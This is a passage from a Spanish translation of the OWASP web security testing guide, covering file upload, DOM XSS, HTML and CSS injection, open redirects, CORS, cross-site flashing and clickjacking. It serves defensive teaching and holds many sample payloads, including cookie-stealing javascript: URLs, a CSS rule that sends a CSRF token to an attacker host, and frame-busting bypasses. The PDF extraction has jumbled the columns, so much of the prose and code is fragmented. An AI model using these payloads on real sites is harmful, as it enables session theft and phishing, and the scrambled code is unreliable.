explotar las vulnerabilidades locales, sólo para nombrar unos pocos.
El probador puede usar muchas de las herramientas utilizadas para los otros
casos de prueba.
similar puede leerse, pero los datos extraídos pueden moverse a lugares • En la aplicación, navegue hasta la presentación del archivo o el mecanismo
incorrectos. de carga.
La aplicación puede estar esperando que solamente se carguen ciertos tipos • Envíe los archivos "no aprobados"para cargar y compruebe que se previene
de archivos para su procesamiento, tales como archivos .CSV o txt. La la carga correctamente.
aplicación no puede validar el archivo subido por su extensión (para
validación de archivos de baja seguridad) o contenido (para validación de
archivos de alta seguridad). Esto puede dar lugar a resultados inesperados
por parte del sistema o la base de datos en el sistema/aplicación o dar a los Casos de prueba relacionados
atacantes métodos adicionales para explotar el sistema/aplicación.
• Pruebe el manejo de archivos de extensiones en busca de información
sensible (OTG-CONFIG-003)
Cómo probar • File upload security best practices: Block a malicious file
stackoverflow.com
cwe.mitre.org
• Si puede subir varios archivos a la vez, debe haber pruebas en el sitio para
verificar que cada archivo sea evaluado correctamente.
Remediación
• Prepare una biblioteca de archivos "no aprobados" para la carga que puede Las aplicaciones se deben desarrollar con mecanismos para que sólo acepte y
contener archivos tales como: archivos jsp, exe o html que contienen scripts. manipule archivos "aceptables" que el resto de funcionalidades de la
aplicación estén listas y esperando. Algunos ejemplos específicos incluyen:
listas negras o blancas de extensiones de archivo, utilizando el "Content-
Type" del encabezado o usando un reconocedor de tipo de archivo, todo esto
sólo permitir tipos de archivo específicos en el sistema.
Resumen
• Desarrolle o consiga un archivo "malicioso" conocido.
Bastantes procesos de negocio dentro de muchas aplicaciones permiten la
carga de información. Regularmente verificamos la validez y seguridad del
texto, pero el aceptar archivos puede implicar aún más riesgo. Para reducir el
riesgo sólo podemos aceptar determinadas extensiones de archivo, pero los • Trate de cargar el archivo malicioso al sistema/aplicación y verifique si se
atacantes son capaces de encapsular un código malicioso en tipos de archivo lo rechaza correctamente.
inerte. Probar en busca de archivos maliciosos verifica que el
sistema/aplicación es capaz de protegerse correctamente contra la carga de
archivos maliciosos por parte de los atacantes.
• Si puede subir varios archivos a la vez, debe haber pruebas en el sitio para
verificar que cada archivo sea evaluado correctamente.
infosecauditor.wordpress.com
Herramientas
• Intercepting proxy
Referencias
Aunque las salvaguardias como las listas negra o blanca de las extensiones
de archivo, que utilizan el "Content-Type" como encabezado o que usan un
• Why File Upload Forms are a Major Security Threat: reconocedor de tipo de archivo no sean siempre protecciones contra este tipo
de vulnerabilidad, cada aplicación que acepta archivos de usuarios debe tener
www.acunetix.com un mecanismo para verificar que el archivo no contiene un código malicioso.
Nunca deben guardarse archivos donde los usuarios o los atacantes pueden
acceder directamente a ellos.
ejemplo, para limitar a los scripts de dominios distintos el obtener las navegador, este se ejecuta directamente en el navegador del usuario sin contacto del
cookies de sesión desde otros dominios. Una vulnerabilidad XSS basada en servidor.
DOM ocurre cuando se modifica el contenido activo, como una función de
JavaScript; se modifica con una solicitud especialmente diseñada, tal como
un elemento DOM que puede ser controlado por un atacante.
Las consecuencias de las fallas XSS basadas en DOM son tan extensas como
las vistas en formas más conocidas de XSS, incluyendo la recuperación de la
cookie, inyección de scripts maliciosos, etc. y, por lo tanto, deben ser tratadas
Ha habido muy pocos trabajos publicados sobre este tema y, como tal, existe con la misma importancia.
muy poca estandarización de su significado y pruebas formales.
</script> • Entradas escritas en la página por el servidor, de una manera que no permite XSS
directo.
Aunque hay poca diferencia con el código JavaScript en cómo se recuperan, es </script>
importante tener en cuenta que cuando la entrada es recibida por el servidor, el
servidor puede aplicar cualquier permutación a los datos que desea, mientras que
las permutaciones realizadas por objetos de JavaScript son bastante claras y
documentadas y, si es así, someFunction en el ejemplo anterior fuera un sink, Por esta razón, las pruebas automatizadas no detectarán las áreas susceptibles a XSS
entonces la explotabilidad del primero dependería de la filtración realizada por el basado en DOM, a menos que la herramienta de prueba pueda realizar un análisis
servidor, mientras que el segundo dependería de la codificación realizada por el adicional del código del lado cliente.
explorador en el objeto window.referer.
Las pruebas manuales, por lo tanto, deben llevarse a cabo y pueden realizarse examinando
Stefano Di Paulo ha escrito un excelente artículo sobre lo que los navegadores las áreas en el código donde se conocen los parámetros que pueden ser utiles para un
devuelven cuando se les pregunta por los distintos elementos de una dirección URL atacante. Los ejemplos de estas zonas incluyen lugares donde el código está escrito
que utiliza los atributos del documento. y la ubicación. Además, JavaScript se dinámicamente a la página y en otros lugares donde el DOM se modifica, o incluso donde
ejecuta a menudo fuera de bloques <script>, según lo evidenciado por los muchos los scripts se ejecutan directamente. Otros ejemplos son descritos en el excelente artículo
vectores que han llevado a evadir los filtros XSS en el pasado y. por lo tanto, al de DOM XSS por Amit Klein, al que se hace referencia al final de esta sección.
rastrear la aplicación, es importante tener en cuenta el uso de scripts en lugares
como controladores de eventos y bloques CSS con atributos de expresión. También
tenga en cuenta que cualquier sitio fuera del CSS u objetos de script tendrán que
evaluarse para determinar qué código está ejecutándose. Una prueba automatizada Referencias
tiene muy poco éxito en la identificación y validación de XSS basado en DOM,
que generalmente identifica XSS al enviar una carga específica y observar la Recursos OWASP
respuesta del servidor. Esto puede funcionar bien en el ejemplo simple
proporcionado a continuación, donde el parámetro de mensaje se refleja de vuelta • DOM based XSS Prevention Cheat Sheet
al usuario:
<script>
Libros Blancos
var pos=document.URL.indexOf(“message=”)+5;
• Document Object Model (DOM: en.wikipedia.org
document.write(document.URL.substring(pos,document.URL.length));
</script>
• DOM Based Cross Site Scripting or XSS of the Third Kind - Amit
Klein: webappsec.org
pero no puede ser detectada en el siguiente caso artificial:
<script>
• Browser location/document URI/URL Sources: code.google.com
var navAgt = navigator.userAgent;
else
Esta vulnerabilidad puede tener muchas consecuencias, como la divulgación de las cookies La página contiene los siguientes scripts:
de sesión de un usuario, que podría ser utilizada para suplantar la identidad de la víctima o,
más generalmente, puede permitir al atacante modificar el contenido de la página vista por <script>
la víctima o el comportamiento de la aplicación.
function loadObj(){
var cc=eval(‘(‘+aMess+’)’);
Cómo probar
document.getElementById(‘mess’).textContent=cc.message;
Esta vulnerabilidad se produce cuando la aplicación carece de una validación adecuada de
entradas y salidas del usuario. JavaScript se utiliza para rellenar dinámicamente las páginas }
web. Esta inyección se produce durante esta fase de procesamiento de contenido y, en
consecuencia, afecta a la víctima.
if(window.location.hash.indexOf(‘message’)==-1)
Cuando se trata de explotar este tipo de cuestiones, considere que algunos caracteres var aMess=”({\”message\”:\”Hello User!\”})”;
reciben un trato diferente en los diferentes navegadores. Para referencia, vea el Wiki de
DOM XSS. else
var
aMess=location.hash.substr(window.location.hash.indexOf(‘message=’)+8);
El siguiente script no realiza ninguna validación de la variable rr que contiene la entrada
del usuario a través de la cadena de consulta y, además, no se aplica ningún tipo de </script>
codificación:
El código anterior contiene una fuente 'location.hash' que está controlada por el atacante,
Prueba de Caja Negra quien puede inyectar directamente en el valor de 'mensaje' un código JavaScript para tomar
el control del navegador del usuario.
var rr = location.search.substring(1);
if(rr)
Referencias
window.location=decodeURIComponent(rr);
Recursos OWASP
Esto implica que un atacante podría inyectar código JavaScript simplemente
enviando la siguiente cadena de consulta: • DOM based XSS Prevention Cheat Sheet
www.victim.com/?javascript:alert(1)
• DOMXSS.com: domxss.com
La prueba de Caja Negra para ejecución en JavaScript no suele realizarse ya que el acceso
al código fuente siempre está disponible, y necesita ser enviado al cliente para ser Libros Blancos
ejecutado.
• Browser location/document URI/URL Sources: codegoogle.com
la identidad de la víctima o, más comúnmente, puede permitir al atacante modificar el añadirá una etiqueta de imagen a la página que se ejecutará un código JavaScript
contenido de la página vista por las víctimas. arbitrario introducido por el usuario malintencionado en el contexto HTML.
Esta vulnerabilidad se produce cuando el ingreso del usuario no está correctamente Las pruebas de Caja Negra mediante inyección HTML normalmente no se realizan,
desinfectado y la salida no está codificada. Una inyección permite al atacante enviar una puesto que el acceso al código fuente siempre está disponible y necesita ser
página HTML maliciosa a una víctima. El navegador de destino no será capaz de enviado al cliente para su ejecución.
distinguir (confiar) entre la parte legítima y la maliciosa y, en consecuencia, analiza y
ejecuta todo como confiable en el contexto de la víctima. Hay una amplia gama de
métodos y atributos que podrían ser utilizados para representar el contenido HTML. Si a
estos métodos se les provee un ingreso no confiable, entonces hay un riesgo alto de XSS, Pruebas de Caja Gris
específicamente una inyección HTML. Se puede inyectar un código HTML malicioso,
por ejemplo, mediante innerHTML, que se utiliza para representar el código HTML Probando las vulnerabilidades de inyección HTML:
ingresado por el usuario. Si las cadenas no se desinfectan correctamente, el problema
llevaría a una inyección HTML basada en XSS. Otro método podría ser document.write() Por ejemplo, mirando el siguiente URL:
http://www.domxss.com/domxss/01_Basics/06_jquery_old_html.html
Cuando se trata de explotar este tipo de problema, considere que algunos caracteres reciben
un trato diferente en los diferentes navegadores. Para referencia ver la Wiki de DOM XSS.
La propiedad innerHTML establece o devuelve el código HTML interno de un elemento. El código HTML contiene el siguente script:
La falta de desinfección en ingresos no confiables y la falta de codificación en los datos de
salida podría permitir a un atacante inyectar código HTML malintencionado. <script src=”../js/jquery-1.7.1.js”></script>
<script>
Ejemplo de código vulnerable: El siguiente ejemplo muestra un fragmento de código function setMessage(){
vulnerable que permite que una entrada no validada sea utilizada para crear html dinámico
en el contexto de la página: var t=location.hash.slice(1);
var user=location.href.substring(userposition+5); }
$(window).bind(“hashchange”,setMessage)
http://vulnerable.site/page.html?user=<img%20src=’aaa’%20onerror=alert(1) </body>
>
Es posible inyectar código HTML. La víctima que visita target.site será redireccionada automáticamente a un
fake-target.site donde un atacante podría colocar una página falsa para robar
las credenciales de la víctima.
Referencias
Recursos OWASP Además, también podrían utilizarse redireccionamientos abiertos para crear
maliciosamente una URL que evite el control de acceso a la aplicación y
• OWASP DOM based XSS Prevention Cheat Sheet luego envíe al atacante hacia funciones privilegiadas a las que normalmente
no debería poder acceder.
• DOMXSS.com: domxss.com
Modificando la URL de entrada no confiable para redirigir a un usuario hacia En el ejemplo anterior, la secuencia de comandos no realiza ninguna
un sitio malicioso, un atacante puede lanzar una estafa de phishing con éxito y validación de la variable "redir" que contiene la entrada del usuario a través de
robar las credenciales del usuario. Ya que la redirección se origina en la la cadena de consulta y, al mismo tiempo, no se aplica ningún tipo de
aplicación real, los intentos de phishing pueden tener un aspecto más codificación. Esta entrada no validada se pasa a las ventanas. El objeto de
confiable. localización origina una vulnerabilidad de redirección de URL.
Un ejemplo de un ataque de phishing puede ser el siguiente: Esto implica que un atacante podría redirigir a la víctima hacia un sitio
malicioso, simplemente enviando la siguiente cadena de consulta:
http://www.target.site?#redirect=www.fake-target.site
http://www.victim.site/?#www.malicious.site
Resumen
Note como si el código vulnerable es el siguiente: Una vulnerabilidad de inyección de CSS implica la capacidad de inyectar
código CSS arbitrario en el contexto de un sitio web de confianza que se
var redir = location.hash.substring(1); mostrará en el navegador de la víctima. El impacto de esta vulnerabilidad
puede variar en función de la carga CSS suministrada: podría causar un Cross-
if (redir) Site Scripting en circunstancias particulares, al robar datos realizando una
extracción de los datos confidenciales o modificaciones de la interfaz del
window.location=decodeURIComponent(redir); usuario.
También sería posible inyectar código JavaScript, por ejemplo, al enviar la Cómo probar
siguiente cadena de consulta:
Esta vulnerabilidad se produce cuando la aplicación permite a un usuario
http://www.victim.site/?#javascript:alert(document.cookie) suministrar CSS generado por el usuario o, si es posible, de alguna manera,
interferir con las hojas de estilo legítimas. Inyectar código en el contexto CSS
da al atacante la posibilidad de ejecutar JavaScript bajo ciertas condiciones,
así como extraer los valores sensibles a través de selectores CSS y funciones
Cuando trate de comprobar este tipo de problema, considere que algunos capaces de generar las solicitudes HTTP. Dar a los usuarios la posibilidad de
caracteres reciben un trato diferente en los distintos navegadores. Ademá,s personalizar sus propias páginas personales mediante el uso de archivos CSS
siempre considere la posibilidad de probar variantes absolutas de direcciones personalizados resulta un riesgo considerable y se debe evitar definitivamente.
URL como se describe aquí: kotowicz.net
• DOMXSS.com: domxss.com
}
</script>
Libros Blancos
• www.victim.com/#red;-o-link:’javascript:alert(1)’;-o-link-
• Krzysztof Kotowicz: “Local or Externa? Weird URL formats on
La misma vulnerabilidad puede aparecer en el caso típico de reflejo XSS en la Probando las vulnerabilidades de inyección CSS
que, por ejemplo, el código PHP se verá como el siguiente:
Se deben llevar a cabo pruebas manuales y analizar el código de JavaScript
<style> para entender si el atacante puede inyectar su propio contenido en el
contexto de la CSS. En particular, debemos estar interesados en cómo el
p{ sitio web devuelve las reglas CSS en función de las entradas.
</style> <b>Hi</b>
<script>
<style> El código anterior contiene una fuente "location.hash" que es controlada por
el atacante, quien puede inyectarlo directamente en el atributo "style" de un
input[name=csrf_token][value=^a] { elemento HTML. Como se mencionó anteriormente, esto puede llevar a
resultados diferentes basados en el navegador adoptado y la carga
background-image: url(http://attacker/log?a); suministrada.
<b>Hi</b>
Nos referimos a las pruebas desde el lado del cliente, por lo tanto, las pruebas $(“a”).click(function(){
de Caja Negra no suelen realizarse ya que el acceso al código fuente siempre
está disponible, y necesita ser enviado al cliente para su ejecución. Sin $(“b”).css(“color”,location.hash.slice(1));
embargo, puede suceder que al usuario se le dé un cierto grado de libertad
para poder suministrar código HTML; en ese caso, es necesario comprobar si });
es posible realizar inyecciones de CSS. Etiquetas como "link" y "style" deben
prohibirse. </script>
dominator.googlecode.com <script>
var d=document.createElement(“script”);
• Got Your Nose! How To Steal Your Precious Data Without if(location.hash.slice(1))
document.body.appendChild(d);
ruxcon.org
alert(document.cookie)
<script>
Cómo probar
function createCORSRequest(method, url) {
}
La siguiente tabla muestra los posibles puntos de inyección (sink) que
deberían revisarse:
xhr.send(null);
</script>
http://evil.com/html.html Los puntos más interesantes son los que permiten a un atacante incluir el
código del cliente (por ejemplo Javascript), ya que esto podría dar lugar a
---- vulnerabilidades XSS.
<?php
header(‘Access-Control-Allow-Origin: http://www.victim.com’); Cuando trate de comprobar este tipo de problema, considere que algunos
caracteres son tratados de manera diferente por diferentes navegadores.
?> Por otra parte, siempre tenga en cuenta la posibilidad de probar variantes
absolutas URL, como se describe aquí: http://kotowicz.net/absolute/
<script>alert(document.cookie);</script>
Herramientas
Pruebas de Caja Negra
• DOMinator: dominator.mindedsecurity.com
Las pruebas de Caja Negra para la manipulación de recursos del cliente,
por lo general, no se realizan, ya que el acceso al código fuente está
siempre disponible puesto que tiene que ser enviado al cliente para ser
ejecutado. Referencias
Cómo probar
• DOMXSS.com: domxss.com
Origin & Access-Control-Allow-Origin
Access-Control-Allow-Credentials
Este encabezado, como parte de una solicitud previa al mandato, indica Solicitud (note el encabezado de "Origen" :)
que la solicitud definitiva puede incluir las credenciales de usuario.
GET http://attacker.bar/test.php HTTP/1.1
Host: attacker.bar
Validación de entradas
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0)
La XMLHttpRequest L2 (o XHR L2) introduce la posibilidad de crear una Gecko/20100101 Firefox/24.0
solicitud entre dominios mediante la API XHR para la compatibilidad en
retrospectiva. Esto puede introducir vulnerabilidades de seguridad que Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
en XHR L1 no estaban presentes. Los puntos interesantes del código para
explotar serían las URL que son pasadas a XMLHttpRequest sin Accept-Language: en-US,en;q=0.5
validación, especialmente si las direcciones absolutas URL son
permitidas, ya que podrían conducir a la inyección del código. Del mismo Referer: http://example.foo/CORSexample1.html
modo, otras partes de la aplicación pueden ser explotadas si los datos de
respuesta no se escapan y podemos controlarlos proporcionando los Origin: http://example.foo
datos de entrada dados por el usuario.
Connection: keep-alive
Otros encabezados
Respuesta (note el encabezado ‘Access-Control-Allow-Origin’:)
Hay otros encabezados involucrados como el de Access-Control-Max-Age
que determina el tiempo en que una solicitud de verificación previa HTTP/1.1 200 OK
puede almacenar en caché en el navegador, o el de Access-Control-Expose-
Headers que indica qué encabezados son seguros para exponer a la API Date: Mon, 07 Oct 2013 18:57:53 GMT
de una especificación API CORS. Ambos son encabezados de respuesta
especificados en el documento del CORS W3C. Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u3
Las pruebas de Caja Negra para encontrar temas relacionados con el Content-Length: 4
intercambio de recursos de origen cruzado, por lo general, no se realizan
debido a que el acceso al código fuente está siempre disponible, ya que Keep-Alive: timeout=15, max=99
tiene que ser enviado al cliente para ser ejecutado.
Connection: Keep-Alive
Content-Type: application/xml
Pruebas de Caja Gris
Revise los encabezados HTTP con el fin de entender cómo se utiliza CORS;
en particular, debemos estar muy interesados en el encabezado de origen [Response Body]
para aprender qué dominios se permiten. Además, la inspección manual
del JavaScript es necesaria para determinar si el código es vulnerable a la
inyección de código debido a una manipulación incorrecta de la entrada
Ejemplo 2: Problema de validación de entrada, XSS con CORS:
proporcionada por el usuario. A continuación se presentan algunos
ejemplos:
Este código hace una solicitud al recurso enviado después del carácter #
en la URL, utilizado inicialmente para obtener recursos en el mismo
servidor.
Ejemplo 1: Respuesta insegura con el comodín '*' en Access-Control-
Allow-Origin:
Código vulnerable:
<script>
http://example.foo/main.php#http://attacker.bar/file.php
req.onreadystatechange = function() {
Por ejemplo, una petición como ésta mostrará el contenido del archivo Solicitud y respuesta generada por esta URL:
profile.php:
GET http://attacker.bar/file.php HTTP/1.1
http://example.foo/main.php#profile.php
Host: attacker.bar
Referer: http://example.foo/main.php
HTTP/1.1 200 OK
Connection: keep-alive
Date: Mon, 07 Oct 2013 19:00:32 GMT
[Response Body]
Cómo probar
Herramientas
Dado que los archivos SWF son interpretados por una máquina virtual
integrada en el propio reproductor, estos pueden ser potencialmente
ZAP es una herramienta de pruebas de penetración integrada, fácil de usar descompilados y analizados. El descompilador más conocido y gratuito de
para encontrar vulnerabilidades en aplicaciones web. Está diseñada para ser ActionScript 2.0 es flare.
utilizada por personas con amplia experiencia en seguridad y, como tal, es
ideal para desarrolladores y evaluadores funcionales que son nuevos en el uso
de pruebas de penetración. ZAP ofrece escáneres automatizados, así como
un conjunto de herramientas que le permiten encontrar vulnerabilidades Para descompilar un archivo SWF con flare solo escriba:
de seguridad de forma manual.
$ flare hello.swf
Referencias
lo que dará lugar a un nuevo archivo llamado hello.flr.
Recursos OWASP
Prueba de Cross-site flashing (OTG-CLIENT-008) El Proyecto de Seguridad Flash de OWASP mantiene una lista actualizada de
desensambladores, descompiladores y otras herramientas de prueba
Resumen relacionadas con Adobe Flash.
codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swfla #initclip
sh.cab#version=9,0,124,0”>
if (!_global.Locale) {
<param name=”movie” value=”somefilename.swf”>
var v1 = function (on_load) {
<param name=”FlashVars” value=”var1=val1&var2=val2”>
var v5 = new XML();
<embed src=”somefilename.swf” width=”550” height=”400”
FlashVars=”var1=val1&var2=val2”> var v6 = this;
</object> if (success) {
Las FlashVars también se pueden inicializar desde la URL: trace(‘Locale loaded xml’);
var v2 = 0;
En ActionScript 3.0, un desarrollador debe asignar explícitamente los while (v2 < v3.length) {
valores FlashVar a las variables locales. Por lo general, esto se ve como:
Locale.strings[v3[v2]._resname] = v3[v2].source.__text;
var paramObj:Object = LoaderInfo(this.root.loaderInfo).parameters;
++v2;
var var1:String = String(paramObj[“var1”]);
}
var var2:String = String(paramObj[“var2”]);
on_load();
} else {}
En ActionScript 2.0, cualquier variable global no inicializada se asume
como una variable de Flash. Las variables globales son aquellas variables };
que se anteponen con _root, _global o _level0. Esto significa que si un
atributo como: if (_root.language != undefined) {
};
Independientemente de si usted está viendo ActionScript 2.0 o
ActionScript 3.0, las variables de Flash pueden ser un vector de ataque.
Veamos una parte del código ActionScript 2.0 que es vulnerable:
El código anterior podría ser atacado mediante la solicitud:
http://victim/file.swf?language=http://evil.example.org/malicious.xml?
Ejemplo:
loadVariables()
loadMovie() Así que si una variable indefinida se utiliza como el primer argumento
para getURL:
getURL()
getURL(_root.URI,’_targetFrame’);
loadMovie()
loadMovieNum()
o si un FlashVar se utiliza como el parámetro que se envía a una función
FScrollPane.loadScrollContent() navigateToURL:
LoadVars.send navigateToURL(request);
XML.load ( ‘url’ )
LoadVars.load ( ‘url’ ) Entonces esto significará que es posible llamar a JavaScript en el mismo
dominio en el que la película está alojada, solicitando:
Sound.loadSound( ‘url’ , isStreaming );
http://victim/file.swf?URI=javascript:evilcode
NetStream.play( ‘url’ );
getURL(‘javascript:evilcode’,’_self’);
flash.external.ExternalInterface.call(_root.callback)
La prueba
getUrl(‘javascript:function(‘+_root.arg+’))
Con el fin de aprovechar una vulnerabilidad, el archivo SWF debe estar
alojado en el host de la víctima, y se deben utilizar las técnicas de XSS
reflejado. Eso obliga al navegador a cargar un archivo SWF puro
asfunction:
directamente en la barra de direcciones (mediante una redirección o
ingeniería social) o cargándolo a través de un iframe desde una página
Se puede utilizar el protocolo especial asfunction para que el enlace
maligna;
ejecute una función ActionScript en un archivo SWF en lugar de abrir una
<iframe src=’http://victim/path/to/file.swf’></iframe> URL. Hasta el lanzamiento de Flash Player 9 r48, asfunction podía ser
utilizada en cada método que tiene una URL como argumento. Después de
ese lanzamiento, asfunction se limita al uso dentro de un campo de texto
HTML.
Esto se debe a que en esta situación el navegador autogenera una página
HTML como si fuera invitada por el host de la víctima.
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
309
Guia de pruebas 4.0 "Borrador"
Esto significa que un evaluador podría intentar inyectar: Así que, si alguna parte del texto puede ser controlada por el evaluador,
una etiqueta A o una etiqueta IMG podría inyectarse, lo que resultaría en
asfunction:getURL,javascript:evilcode la modificación de la GUI o del uso de XSS en el navegador.
en cada método inseguro como: Algunos ejemplos de ataque con una etiqueta A:
http://victim/file.swf?URL=asfunction:getURL,javascript:evilcode
Desde el punto de vista de seguridad, podría ser objeto de abuso si parte La etiqueta IMG podría ser utilizada también:
de su argumento puede ser controlado:
<img src=’http://evil/evil.swf’ >
flash.external.ExternalInterface.call(_root.callback);
<img src=’javascript:evilcode//.swf’ > (.swf is necessary to bypass flash
player internal filter)
El patrón de ataque para este tipo de defecto podría ser algo como lo
siguiente:
Nota: desde el lanzamiento de Flash Player 9.0.124.0 del Flash player XSS
eval(evilcode) ya no es explotable, pero la modificación GUI todavía se puede lograr.
ya que el JavaScript interno ejecutado por el navegador será algo como: Cross-Site Flashing
eval(‘try { __flash__toXML(‘+__root.callback+’) ; } catch (e) { El cross-site flashing (XSF) es una vulnerabilidad que tiene un efecto
“<undefined/>”; }’) similar a XSS.
Inyección HTML
Los objetos de campo de texto pueden hacer un HTML mínimo El XSF se produce desde diferentes dominios:
estableciendo:
• Una película carga otra película con la función loadMovie * o con otros
tf.html = true hacks y tiene acceso a la misma zona protegida o a parte de ella.
tf.htmlText = ‘<tag>text</tag>’
Esto podría llevarse a cabo forzando a un SWF defectuoso a cargar un Desde mayo de 2007, tres nuevas versiones de Flash Player fueron
archivo flash malicioso externo. Este ataque podría resultar en XSS o en la lanzadas al mercado por Adobe. Cada nueva versión restringe algunos de
modificación de la interfaz gráfica del usuario, con el fin de engañarlo los ataques descritos anteriormente.
para que inserte sus credenciales en un formulario flash falso. El XSF
podría ser utilizado en presencia de una inyección de Flash HTML o de
archivos SWF externos cuando se utilicen métodos loadMovie *.
Redirectores abiertos
Herramientas
En el caso de Flash, la URL maliciosa podría verse como: • Adobe SWF Investigator: labs.adobe.com
http://trusted.example.org/trusted.swf?getURLValue=http://www.evil-
spoofing-website.org/phishEndUsers.html
• SWFScan: downloadcrew.com
• Disassembler - Flasm: flasm.sourceforge.net "Clickjacking" (que es un subconjunto de “UI redressing”) es una técnica
maliciosa que consiste en engañar a un usuario web para que interactúe
(en la mayoría de los casos haciendo clic) con algo diferente a lo que el
usuario cree que está interactuando.
• Swfmill - Convert Swf to XML and vice versa: swfmill.org
Este tipo de ataque, que puede ser utilizado solo o en combinación con
• Debugger Version of Flash Plugin/Player: adobe.com otros ataques, podría potencialmente enviar comandos no autorizados o
revelar información confidencial mientras la víctima está interactuando
con páginas web aparentemente inofensivas. El término "clickjacking" fue
acuñado por Jeremiah Grossman y Robert Hansen en 2008.
Referencias
OWASP
Un ataque de clickjacking utiliza características aparentemente inocuas
• Proyecto de Seguirdad Flash OWASP: El Proyecto de Seguirdad OWASP
de HTML y Javascript para obligar a la víctima a realizar acciones no
Flash tiene incluso más referencias que las que se enumeran a
deseadas tales como hacer clic en un botón que parece realizar otra
continuación:
operación. Se trata de un problema de seguridad "del lado del cliente",
que afecta a una gran variedad de navegadores y plataformas
owasp.org
Para llevar a cabo este tipo de técnica, el atacante tiene que crear una
Libros Blancos
página web aparentemente inofensiva que cargue la aplicación al objetivo
de destino, mediante el uso de un iframe (convenientemente oculto
• Testing Flash Applications: A new attack vector for XSS
mediante el uso de código CSS).
and XSFlashing: owasp.org
adobe.com
Resumen
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
312
Guia de pruebas 4.0 "Borrador"
Una vez que la víctima navega en la página web ficticia, piensa que está <html>
interactuando con la interfaz de usuario visible, pero efectivamente está
llevando a cabo acciones en la página oculta. <head>
Debido a que la página oculta es una página auténtica, el atacante puede </head>
engañar a los usuarios para realizar acciones que nunca tuvieron la
intención de hacer a través de un posicionamiento "ad hoc" de los <body>
elementos de la página web.
<p>Website is vulnerable to clickjacking!</p>
</body>
</html>
Los métodos para proteger una página web del clickjacking se pueden
Tenemos que descubrir si el sitio web que estamos probando no tiene dividir en dos grandes categorías:
ninguna protección contra ataques de clickjacking o, si los
desarrolladores han puesto en práctica algunas formas de protección, si
estas técnicas son susceptibles de ser evadidas. Una vez que sabemos que
• Protección del lado del cliente: Frame Busting
el sitio web es vulnerable, podemos crear una "prueba de concepto" para
explotar la vulnerabilidad.
• Protección del lado del servidor: X-Frame-Options
Protección del lado del clente: Frame Busting convierte en una violación de la seguridad en todos los navegadores
populares debido a la política de navegación de marco descendiente.
El método más común del lado del cliente, que ha sido desarrollado para política. Esta violación de seguridad impide la navegación contra-acción.
proteger a una página web del clickjacking, se llama Frame Busting y se
compone de un script o secuencia de comandos en cada página, que no El código del sitio de destino del frame busting (sitio de destino):
deben ser enmarcados. El objetivo de esta técnica es evitar que un sitio
funcione cuando se carga dentro de un marco. if(top.location!=self.locaton) {
parent.location = self.location;
• self.parent.location = document.location
• Atributo Sandbox: con HTML5 hay un nuevo atributo llamado
• parent.location.href = self.location
"sandbox". Éste permite un conjunto de restricciones en el contenido
• parent.location = self.location cargado en el iframe. Por el momento, este atributo sólo es compatible
con Chrome y Safari.
Modo Diseño: Paul Stone mostró un problema de seguridad en relación página 204:
con el "designMode" que puede ser activado en la página de referencia (a
través de document.designMode), desactivando JavaScript en la parte <?php
superior y el sub-marco. Actualmente, el modo de diseño se implementa
en Firefox e Internet Explorer 8. header(“HTTP/1.1 204 No Content”);
?>
El evento onBeforeUnload
El evento onbeforeunload podría ser utilizado para evadir el código de Página del atacante:
frame busting. Este evento sucede cuando el código de frame busting
quiere destruir el iframe cargando la URL en toda la página web y no sólo <script>
en el iframe. La función de controlador devuelve una cadena que se dirige
al usuario para confirmar si quiere salir de la página. Cuando se muestra var prevent_bust = 0;
esta cadena al usuario es probablemente para cancelar la navegación,
derrotando el intento del frame busting en el objetivo. window.onbeforeunload = function() {
prevent_bust++;
} }
</script> }, 1);
La técnica anterior requiere la interacción del usuario, pero el mismo <iframe src=”http://target site”>
resultado se puede lograr sin preguntar al usuario. Para ello, el atacante
tiene que cancelar automáticamente la solicitud de navegación de entrada
en un controlador de eventos onbeforeunload, presentando en varias
Filtro XSS
ocasiones (por ejemplo, cada milisegundo) una solicitud de navegación a
una página web que responde a un encabezado "HTTP / 1.1 204 No
A partir de Google Chrome 4.0 y de IE8, se introdujeron filtros XSS para
Content".
proteger a los usuarios contra ataques reflejados XSS. Nava y Lindsay han
observado que este tipo de filtros se puede utilizar para desactivar el
código de frame busting falso como código malicioso.
Ya que con esta respuesta el navegador no va a hacer nada, el resultado
de esta operación es la descarga de la tubería solicitada, inutilizando el
intento del frame busting.
• Filtro de IE8 XSS: este filtro tiene visibilidad en todas las solicitudes y
los parámetros de respuestas fluyen a través del navegador web y se los
if ( top != self )
Ejemplo:
Código de ataque:
<script>
<iframe src=”http://target site/?param=<script>if”>
var location = “xyz”;
</script>
• Chrome 4.0 XSSAuditor filter: Chrome tiene un comportamiento un poco
diferente en comparación con el filtro de IE8 XSS. De hecho, con este filtro un <iframe src=”http://target site”></iframe>
atacante podría desactivar un "guión" que pasa por su código en un parámetro de
la solicitud. Esto permite que la página de encuadre se dirija específicamente a un • Redefinición de localización en Safari 4.0.4: Para romper el código de
único fragmento que contiene el código de frame busting, dejando intactos todos frame busting con "top.location", es posible enlazar "localización" a una
los demás códigos. función a través de defineSetter (a través de la ventana), de manera que
un intento de leer o navegar a la "top.location" producirá un error.
</script>
Protección del lado del servidor: X-Frame-Options
las páginas web que no deben ser enmarcadas. Este encabezado puede destino permite autenticar y autorizar a los usuarios a realizar una
tomar los valores DENY (Negar), SAMEORIGIN (Mismo origen), ALLOW- transferencia de dinero a otra cuenta.
FROM origin (permitir desde el origen), o non-standard ALLOWALL (no
estándar permitir todo). El valor recomendado es DENY.
$_SESSION[‘antiCsrf’] = $csrfToken;
$form = ‘
Proxies
<form name=”transferForm” action=”confirm.php” method=”POST”>
Los web proxies son conocidos por añadir y quitar encabezados. En el
caso en el que un web proxy despoje al encabezado "X-Frame-Options", el <div class=”box”>
sitio pierde su protección de enmarcar.
<h1>BANK XYZ - Confirm Transfer</h1>
<p>
Versión móvil del sitio web
Do You want to confirm a transfer of <b>’.
También en este caso, ya que el encabezado"X-Frame-Options" tiene que $_RE UEST[‘amount’] .’ €</b> to account: <b>’. $_RE UEST[‘account’]
ser implementado en todas las páginas del sitio web, los desarrolladores .’</b> ?
pueden no haber protegido a la versión móvil de la página web.
</p>
<label>
Crear una "prueba de concepto"
<input type=”hidden” name=”amount”
